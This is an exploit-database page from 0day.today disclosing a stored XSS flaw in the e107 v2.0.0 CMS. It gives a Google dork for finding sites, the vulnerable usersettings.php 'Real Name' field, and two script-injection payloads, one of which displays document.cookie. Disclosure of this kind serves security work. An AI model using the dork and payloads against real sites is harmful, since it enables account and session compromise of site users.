[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

e107 2 Bootstrap CMS - XSS Vulnerability

Author
0x97
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-23059
Category
web applications
Date add
03-01-2015
Platform
php
_____       _____  ______
|  _  |     |  _  ||___  /
| |/' |_  __| |_| |   / /
|  /| \ \/ /\____ |  / / 
\ |_/ />  < .___/ /./ /  
 \___//_/\_\\____/ \_/   
                        by bl4ck s3c
 
 
# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
# Date: 03-01-2014
# Google Dork : Proudly powered by e107
# Exploit Author: Ahmet Agar / 0x97
# Version: 2.0.0
# Vendor Homepage: http://e107.org/
# Tested on: OWASP Mantra & Iceweasel
  
# Vulnerability Description:
 
CMS user details section is vulnerable to XSS. You can run XSS payloads.
 
XSS Vulnerability #1:
 
Go Update user settings page
 
"http://{target-url}/usersettings.php"
 
Set Real Name value;
 
"><script>alert(String.fromCharCode(88, 83, 83))</script>
 
or
 
"><script>alert(document.cookie)</script>
 
 
========
Credits:
========
  
Vulnerability found and advisory written by Ahmet Agar.
  
===========
References:
===========
  
http://www.0x97.info
htts://twitter.com/_HacKingZ_

#  0day.today [2024-12-24]  #